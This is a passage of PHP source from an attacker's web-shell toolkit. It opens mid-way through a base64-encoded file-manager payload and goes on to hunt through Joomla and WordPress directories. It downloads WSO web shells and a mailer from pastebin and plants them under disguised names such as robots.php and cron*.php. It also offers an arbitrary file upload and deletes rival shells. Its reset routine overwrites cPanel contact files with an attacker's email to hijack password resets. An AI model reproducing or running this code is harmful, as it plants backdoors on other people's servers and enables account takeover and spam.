CAgICAgPHNlbGVjdCBuYW1lPVwib3B0XCI+CgkgICAgPG9wdGlvbiB2YWx1ZT1cIlwiPjwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJkZWxldGVcIj5EZWxldGU8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiY2htb2RcIj5DaG1vZDwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJyZW5hbWVcIj5SZW5hbWU8L29wdGlvbj4KICAgICAgICA8L3NlbGVjdD4KICAgICAgICA8aW5wdXQgdHlwZT1cImhpZGRlblwiIG5hbWU9XCJ0eXBlXCIgdmFsdWU9XCJkaXJcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cImhpZGRlblwiIG5hbWU9XCJuYW1lXCIgdmFsdWU9XCIkZGlyXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGRpclwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwic3VibWl0XCIgdmFsdWU9XCI+XCIgLz4KICAgICAgICA8L2Zvcm0+PC9jZW50ZXI+PC90ZD4KICAgICAgICA8L3RyPiI7CiAgICB9CiAgICBlY2hvICc8dHIgY2xhc3M9ImZpcnN0Ij48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48L3RyPic7CiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRmaWxlKXsKICAgICAgICBpZighaXNfZmlsZSgiJHBhdGgvJGZpbGUiKSkgY29udGludWU7CiAgICAgICAgJHNpemUgPSBmaWxlc2l6ZSgiJHBhdGgvJGZpbGUiKS8xMDI0OwogICAgICAgICRzaXplID0gcm91bmQoJHNpemUsMyk7CiAgICAgICAgaWYoJHNpemUgPj0gMTAyNCl7CiAgICAgICAgICAgICRzaXplID0gcm91bmQoJHNpemUvMTAyNCwyKS4nIE1CJzsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgJHNpemUgPSAkc2l6ZS4nIEtCJzsKICAgICAgICB9CgogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9maWxlc3JjPSRwYXRoLyRmaWxlJnBhdGg9JHBhdGhcIj4kZmlsZTwvYT48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiIuJHNpemUuIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+IjsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPic7CiAgICAgICAgZWNobyBwZXJtcygiJHBhdGgvJGZpbGUiKTsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzwvZm9udD4nOwogICAgICAgIGVjaG8gIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+PGZvcm0gbWV0aG9kPVwiUE9TVFwiIGFjdGlvbj1cIj9vcHRpb24mcGF0aD0kcGF0aFwiPgogICAgICAgIDxzZWxlY3QgbmFtZT1cIm9wdFwiPgoJICAgIDxvcHRpb24gdmFsdWU9XCJcIj48L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiZGVsZXRlXCI+RGVsZXRlPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImNobW9kXCI+Q2htb2Q8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwicmVuYW1lXCI+UmVuYW1lPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImVkaXRcIj5FZGl0PC9vcHRpb24+CiAgICAgICAgPC9zZWxlY3Q+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwidHlwZVwiIHZhbHVlPVwiZmlsZVwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwiaGlkZGVuXCIgbmFtZT1cIm5hbWVcIiB2YWx1ZT1cIiRmaWxlXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGZpbGVcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cInN1Ym1pdFwiIHZhbHVlPVwiPlwiIC8+CiAgICAgICAgPC9mb3JtPjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPC90cj4iOwogICAgfQogICAgZWNobyAnPC90YWJsZT4KICAgIDwvZGl2Pic7Cn0KZWNobyAnPGJyLz4KPC9CT0RZPgo8L0hUTUw+JzsKZnVuY3Rpb24gcGVybXMoJGZpbGUpewogICAgJHBlcm1zID0gZmlsZXBlcm1zKCRmaWxlKTsKCmlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApIHsKICAgIC8vIFNvY2tldAogICAgJGluZm8gPSAncyc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHhBMDAwKSA9PSAweEEwMDApIHsKICAgIC8vIFN5bWJvbGljIExpbmsKICAgICRpbmZvID0gJ2wnOwp9IGVsc2VpZiAoKCRwZXJtcyAmIDB4ODAwMCkgPT0gMHg4MDAwKSB7CiAgICAvLyBSZWd1bGFyCiAgICAkaW5mbyA9ICctJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDYwMDApID09IDB4NjAwMCkgewogICAgLy8gQmxvY2sgc3BlY2lhbAogICAgJGluZm8gPSAnYic7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHg0MDAwKSA9PSAweDQwMDApIHsKICAgIC8vIERpcmVjdG9yeQogICAgJGluZm8gPSAnZCc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHgyMDAwKSA9PSAweDIwMDApIHsKICAgIC8vIENoYXJhY3RlciBzcGVjaWFsCiAgICAkaW5mbyA9ICdjJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDEwMDApID09IDB4MTAwMCkgewogICAgLy8gRklGTyBwaXBlCiAgICAkaW5mbyA9ICdwJzsKfSBlbHNlIHsKICAgIC8vIFVua25vd24KICAgICRpbmZvID0gJ3UnOwp9CgovLyBPd25lcgokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDEwMCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA4MCkgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwoKLy8gR3JvdXAKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMjApID8gJ3InIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMTApID8gJ3cnIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDgpID8KICAgICAgICAgICAgKCgkcGVybXMgJiAweDA0MDApID8gJ3MnIDogJ3gnICkgOgogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDQwMCkgPyAnUycgOiAnLScpKTsKCi8vIFdvcmxkCiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDA0KSA/ICdyJyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAyKSA/ICd3JyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAxKSA/CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKICAgICAgICAgICAgKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CgogICAgcmV0dXJuICRpbmZvOwp9Cj8+');
322. $save=fopen('lite.php','w');
323. fwrite($save,$al7wa);
324. fclose($save);
325. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$url/lite.php"." target="."_blank".">www.$azzouz/lite.php"."</a><br>";
326. }
327. ////////////
328. if(isset($_GET['ls'])){
329. $gg= $_GET["ls"];
330. if(eregi("array",$gg)){$namex = 'array';
331. }
332. else{$namex = 'ch';
333. }
334. $dexter = dirname($_SERVER["PHP_SELF"]); $dirname = "__/$dexter";
335. $dgh=str_replace(array("__/////","__////","__///","__//","__/"), "",$dirname);
336. echo "
337. <center>
338. <br>
339. <form style='margin-top: -140px;'method='POST'>
340. <textarea style='width: 400px;height: 300px;margin: 0px;'placeholder='' name='config'>administrator
341. components
342. help
343. includes
344. language
345. manifests
346. modules
347. plugins
348. media
349. templates
350. cache
351. cli
352. components/com_foxcontact
353. components/com_jce
354. components/com_users
355. components/com_wrapper
356. components/com_xmap
357. components/error_log
358. libraries/cms
359. libraries/joomla
360. media/cms
361. media/com_finder
362. media/com_foxcontact
363. media/contacts
364. media/editors
365. media/jce
366. media/mailto
367. media/media
368. plugins/captcha
369. plugins/content
370. plugins/editors
371. plugins/extension
372. plugins/finder
373. plugins/search
374. plugins/system
375. plugins/user
376. templates/atomic
377. templates/beez5
378. wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader
379. wp-content/plugins/woocommerce-products-filter/lib
380. wp-content/plugins/woocommerce-products-filter
381. wp-content/plugins
382. wp-content/uploads
383. wp-content/upgrade
384. wp-content/languages
385. wp-content/themes
386. wp-content/mu-plugins
387. wp-content
388. public_html
389. $dgh</textarea><br><br>
390. <input type='submit' name='$namex' value='Submit'><br>
391. </form>
392. ";
393. unlink('a.txt');
394. unlink('php.txt');
395. unlink('other.txt');
396. unlink('f.txt');
397. //---------------------------------------------------------------------
398. $block = array ('view','system','cron','wp-multipart.php','king.php','endurance-browser-cache.php','submitticket.php','ssv3_directory.php','mk_conf.php','connect.php','config.txt.php','conf_global.php','endurance-page-cache.php','advanced-cache.php','endurance-browser-cache.php','wp-views.php','ls.php','users.php','configuration','application.php','defines.php','framework.php','menu.php','pathway.php','router.php','controller.php','foxcontact.php','wrapper.php','displayer.php','jce.php','xmap.php','factory.php','methods.php','useragent','offline','api','action.php','index.php','hello.php','akismet.php','aq_resizer.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config-sample.php','wp-config.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','error.php','platform.php','cms.php','import.php','loader.php','finder_indexer.php','garbagecron.php','update_cron.php','setup.php','output.php','ini.php','authorze.php','component.php');
399. //---------------------------------------------------------------------
400. if($_POST['array']){
401. $haxor = $_POST['config'];
402. $ex=explode("\r\n",$haxor);
403. $total = count($ex);
404. echo "<center>Total : <font color = 'red'>$total</font><br></center>";
405. echo "<br><br><font color = 'blue'>array </font>(";
406. foreach($ex as $sexter){
407. echo "'";
408. echo "<font color = 'red'>$sexter</font>";
409. echo "',";
410. }
411. echo ");";
412. }
413. if($_POST['ch']){
414. $haxor = $_POST['config'];
415. $ex=explode("\r\n",$haxor);
416. $total = count($ex);
417. echo "<center>Total : <font color = 'red'>$total</font><br></center>";
418. $dir=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../','../../../../../../../','../../../../../../../../');
419. foreach($dir as $find){
420. foreach($ex as $sexter){
421. $p1 = $find.$sexter;
422. if (file_exists("$p1")){
423. $files1 = scandir($p1);
424. foreach ($files1 as $file){
425. $kingdom = $p1."/".$file;
426. $site=str_replace(array("\\/","../","./","//","public_html/"), "",$kingdom);
427. $filter = fopen("f.txt", 'a+');
428. fwrite($filter, "$site\r\n");
429. fclose($filter);
430. }
431. }
432. }
433. }
434. $emails=@file_get_contents('f.txt');
435. $ex = explode("\n",$emails);
436. $count = count($ex);
437. if(isset($emails)&&$count>=1){
438. }
439. else{
440. echo "<br> List not correct <br>";
441. exit;}
442. echo "<br> [<font color = 'red'>$count</font>]&nbsp;";
443. if(isset($emails)){
444. for($i=0;$i<=$count;$i++){
445. $d = strtolower($ex[$i]);
446. if(strstr($d,".php")){
447. $frr.=$d;
448. $fr = $fr + 1;
449. }
450. else{
451. $ather .=$d;
452. $nn=$nn + 1;
453. }
454. }
455. }
456. if($fr){
457. echo "[<font color = 'red'>$fr</font>]&nbsp;";
458. $open=fopen("php.txt",'ab');
459. fwrite($open,"$frr\r\n");
460. fclose($open);
461. }
462. echo "[<font color = 'red'>$nn</font>]&nbsp;<br><br>";
463. $open=fopen("other.txt",'ab');
464. fwrite($open,"$ather\r\n");
465. fclose($open);
466. $getlist=@file_get_contents('php.txt');
467. $ex=explode("\r",$getlist);
468. $haxor = array_unique($ex);
469. echo "<div style='font-size: 15px; line-height: 25px;'>";
470. foreach ($haxor as $site){
471. $regex = '('.implode($block, ')|(').')';
472. if(eregi($regex,$site)){
473. }
474. else {
475. $sa=fopen('a.txt','ab');
476. fwrite($sa,"$site"."\r\n");
477. fclose($sa);
478. }
479. }
480. $sez = $_SERVER["SERVER_NAME"];
481. $old=explode("\r\n",@file_get_contents('a.txt'));
482. $ex_old = array_unique($old);
483. $dexter = file_get_contents('a.txt');
484. $total = count($old);
485. $ggg= $_GET["ls"];
486. if(eregi("url",$ggg)){
487. echo"<center>
488. <table style='width: 30%'>
489. <tr>
490. <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>";
491. foreach ($ex_old as $site){
492. echo "$sez/$site\r\n";
493. }
494. echo"</textarea></td>
495. </tr>
496. </table>
497. </center>";
498. echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
499. }
500. else {
501. echo"<center>
502. <table style='width: 30%'>
503. <tr>
504. <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>
505. $dexter
506. </textarea></td>
507. </tr>
508. </table>
509. </center>";
510. echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
511. }
512. foreach ($ex_old as $site){
513. echo "<br><a href='http://$sez/$site' target='_blank' style='text-decoration: blink;'>$sez/$site</a>";
514. }
515. echo "</div>";
516. }
517. echo'</center>';
518. }
519. //////////////
520. if(isset($_GET["random"])){
521. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
522. foreach($sss as $pa){
523. $p1=array("$pa/cli/");
524. foreach($p1 as $path){
525. if (file_exists("$path")){
526. $print = $path."cron".rand(999, 123).".php";
527. $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
528. $save=fopen($print,'w');
529. fwrite($save,$html);
530. $print = "__$print";
531. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
532. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
533. break;
534. }
535. $p2=array("$pa/includes/");
536. foreach($p2 as $path){
537. if (file_exists("$path")){
538. $print = $path."cron".rand(999, 123).".php";
539. $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
540. $save=fopen($print,'w');
541. fwrite($save,$html);
542. $print = "__$print";
543. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
544. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
545. }}
546. }
547. //////
548. $p3=array("$pa/plugins/user/");
549. foreach($p3 as $path){
550. if (file_exists("$path")){
551. $print = $path."system".rand(999, 123).".php";
552. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
553. $save=fopen($print,'w');
554. fwrite($save,$html);
555. $print = "__$print";
556. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
557. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
558. break;
559. }
560. $p4=array("$pa/plugins/");
561. foreach($p4 as $path){
562. if (file_exists("$path")){
563. $print = $path."system".rand(999, 123).".php";
564. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
565. $save=fopen($print,'w');
566. fwrite($save,$html);
567. $print = "__$print";
568. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
569. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
570. }}
571. }
572. //////
573. $p5=array("$pa/libraries/cms/");
574. foreach($p5 as $path){
575. if (file_exists("$path")){
576. $print = $path."view".rand(999, 123).".php";
577. $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
578. $save=fopen($print,'w');
579. fwrite($save,$html);
580. $print = "__$print";
581. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
582. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
583. break;
584. }
585. $p6=array("$pa/libraries/");
586. foreach($p6 as $path){
587. if (file_exists("$path")){
588. $print = $path."view".rand(999, 123).".php";
589. $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
590. $save=fopen($print,'w');
591. fwrite($save,$html);
592. $print = "__$print";
593. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
594. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
595. }}
596. }
597. }
598. }
599. if(isset($_GET["presta"])){
600. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
601. foreach($sss as $pa){
602. $p1=array("$pa/cache/");
603. foreach($p1 as $path){
604. if (file_exists("$path"))
605. {
606. /////////////////////////////////////
607. $wtf1 = "$path"."authorze.php";
608. $wtf2 = "$path"."setup.php";
609. $wtf3 = "$path"."output.php";
610. $wtf4 = "$path"."manager.php";
611. /////////////////////////////////////
612. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
613. $save=fopen($wtf1,'w');
614. fwrite($save,$html);
615. //////////////////////////////////////
616. $zz = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
617. $gg=fopen($wtf2,'w');
618. fwrite($gg,$zz);
619. /////////////////////////////////////
620. $zzt = @file_get_contents('https://pastebin.com/raw/wL527WWg');
621. $ggt=fopen($wtf3,'w');
622. fwrite($ggt,$zzt);
623. /////////////////////////////////////
624. $ert = $multipart;
625. $fgh=fopen($wtf4,'w');
626. fwrite($fgh,$ert);
627. }}
628. }
629. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/manager.php"." target="."_blank".">www.$azzouz/cache/manager.php"."</a><br>";
630. echo "----------------------------------------------------------------------------------------------------<br>";
631. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/output.php"." target="."_blank".">www.$azzouz/cache/output.php"."</a><br>";
632. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/authorze.php"." target="."_blank".">www.$azzouz/cache/authorze.php"."</a><br>";
633. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/setup.php?pass=ransomware"." target="."_blank".">www.$azzouz/cache/setup.php"."</a><br>";
634. echo "----------------------------------------------------------------------------------------------------<br>";
635. }
636. if(isset($_GET["dexter"]))
637. {
638. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
639. $setup = "htaccess.php";
640. $set=fopen($setup,'w');
641. fwrite($set,$html);
642. $mailer = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
643. $authorze = "pagebreak.php";
644. $auth=fopen($authorze,'w');
645. fwrite($auth,$mailer);
646. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
647. $uio = "robots.php";
648. $cvb=fopen($uio,'w');
649. fwrite($cvb,$ghjk);
650. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/htaccess.php"." target="."_blank".">www.$url/htaccess.php"."</a><br>";
651. echo "<font style='color:#9c0000'>[+] </font><a style='color:#5a3ab7' href="."http://$url/pagebreak.php?pass=ransomware"." target="."_blank".">www.$url/pagebreak.php"."</a><br>";
652. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/robots.php"." target="."_blank".">www.$url/robots.php"."</a><br>";
653. echo "----------------------------------------------------------------------------------------------------<br>";
654. }
655. if(isset($_GET["upload"]))
656. {
657. echo '<center><font color="Red" size="4">';
658. /// Script Upload By dexter \\\
659. if(isset($_POST['Submit'])){
660. $filedir = "";
661. $maxfile = '2000000';
662. $mode = '0644';
663. $userfile_name = $_FILES['image']['name'];
664. $userfile_tmp = $_FILES['image']['tmp_name'];
665. if(isset($_FILES['image']['name'])) {
666. $qx = $filedir.$userfile_name;
667. @move_uploaded_file($userfile_tmp, $qx);
668. @chmod ($qx, octdec($mode));
669. echo" <a href=$userfile_name><center><b>Sucess Upload $userfile_name</b></center></a>";
670. }
671. }
672. else{
673. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
674. }
675. echo '</center></font>';
676. }
677. if(isset($_GET["kill"]))
678. {
679. unlink('a.txt');
680. unlink('php.txt');
681. unlink('other.txt');
682. unlink('f.txt');
683. $azazaz=array("lite.php","cmd.php","remote.php","ls.php","mw.php","m.php","w.php","ww.php","baa.php","pr.php","check.php","index1.php","index2.php","shl.php","ex.php","exx.php","w.php","XMX.php","zaaz.php","k.php","etc.php","222.php","list.txt","leafpw.php","aminox.php","x","zeb.php","1.php","cgi.php","root.php","py.php","gat.php","leaf.php","masss.php","ox.php","tim.php","sh.php","tazz.php","up.php","abderahim-zamolix.php","emails.php","s.php","zaz.php","zeubda.php","K7.php","zabi.php","plugin.php","olux.php","Rebel.php","shell.php","wso.php","upload.php","mailer.php","phpleafmailer.php","wget.php","melex1.php","cvv.php","hous.zip","x.php","spam.php","indoxploit.php","config.php","1337w0rm.php","sym.php","bt.php","amine.php","mama.php","uploader.php","hous.php","ok.php");
684. foreach($azazaz as $zamla){
685. if (!unlink($zamla)) { echo ("");}
686. $l97ba = "modules/$zamla";
687. if (!unlink($l97ba)) { echo ("");}
688. $l97ba = "../$zamla";
689. if (!unlink($l97ba)) { echo ("");}
690. $l97ba = "../../$zamla";
691. if (!unlink($l97ba)) { echo ("");}
692. $l97ba = "../modules/$zamla";
693. if (!unlink($l97ba)) { echo ("");}
694. $l97ba = "./$zamla";
695. if (!unlink($l97ba)) { echo ("");}
696. }
697. $jj = basename($_SERVER['SCRIPT_NAME']);
698. $az6 = "ms-authorze.zip";
699. $az7 = "../../ms-authorze.zip";
700. $az8 = "../../../../ms-authorze.zip";
701. $az0 = "wp-multipart.php";
702. $az1 = "../wp-multipart.php";
703. $az2 = "../../wp-multipart.php";
704. $az3 = "../../../wp-multipart.php";
705. $az4 = "../../../../wp-multipart.php";
706. $az5 = "../../../../../wp-multipart.php";
707. $az00 = "cache/./multipart.php";
708. $az9 = "cache/../multipart.php";
709. $az10 = "cache/../../multipart.php";
710. $az11 = "cache/../../../multipart.php";
711. $az12 = "cache/../../../../multipart.php";
712. if (!unlink($jj))
713. {
714. echo ("failed<br>");
715. }else
716. {
717. echo ("Sucess<br>");
718. }
719. if (!unlink($az1)) { echo ("");}
720. if (!unlink($az2)) { echo ("");}
721. if (!unlink($az3)) { echo ("");}
722. if (!unlink($az4)) { echo ("");}
723. if (!unlink($az5)) { echo ("");}
724. if (!unlink($az0)) { echo ("");}
725. if (!unlink($az6)) { echo ("");}
726. if (!unlink($az7)) { echo ("");}
727. if (!unlink($az8)) { echo ("");}
728. if (!unlink($az00)) { echo ("");}
729. if (!unlink($az9)) { echo ("");}
730. if (!unlink($az10)) { echo ("");}
731. if (!unlink($az11)) { echo ("");}
732. if (!unlink($az12)) { echo ("");}
733. $rr=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
734. foreach($rr as $tt){
735. $uu=array("$tt/wp-admin/","$tt/wp-includes/","$tt/cache/");
736. foreach($uu as $oo){
737. if (file_exists("$oo"))
738. {
739. $s1 = "$oo"."ms-kzip.php";
740. $s2 = "$oo"."ms-authorze.zip";
741. $s3 = "$oo"."manager.php";
742. $s4 = "$oo"."ms-authorze.zip";
743. if (!unlink($s1)) { echo ("");}
744. if (!unlink($s2)) { echo ("");}
745. if (!unlink($s3)) { echo ("");}
746. if (!unlink($s4)) { echo ("");}
747. }}
748. }
749. }
750. if(isset($_GET["reset"]))
751. {
752. $site = $_SERVER['HTTP_HOST'];
753. $ips = getenv('REMOTE_ADDR');
754. $filt = getcwd();
755. $fuck = explode("/",$filt);
756. $user = $fuck[2];
757. $email = "dexterkh1212x@gmail.com";
758. $wr = 'email:'.$email;
759. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
760. fwrite($f, $wr);
761. fclose($f);
762. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
763. fwrite($f, $wr);
764. fclose($f);
765. $parm = $site.':2083/resetpass?start=1';
766. echo "<br> $parm<br>";
767. $parm = $ips.':2083/resetpass?start=1';
768. echo "<br> $parm<br>";
769. $toba = __file__;
770. echo "<br> $toba<br>";
771. }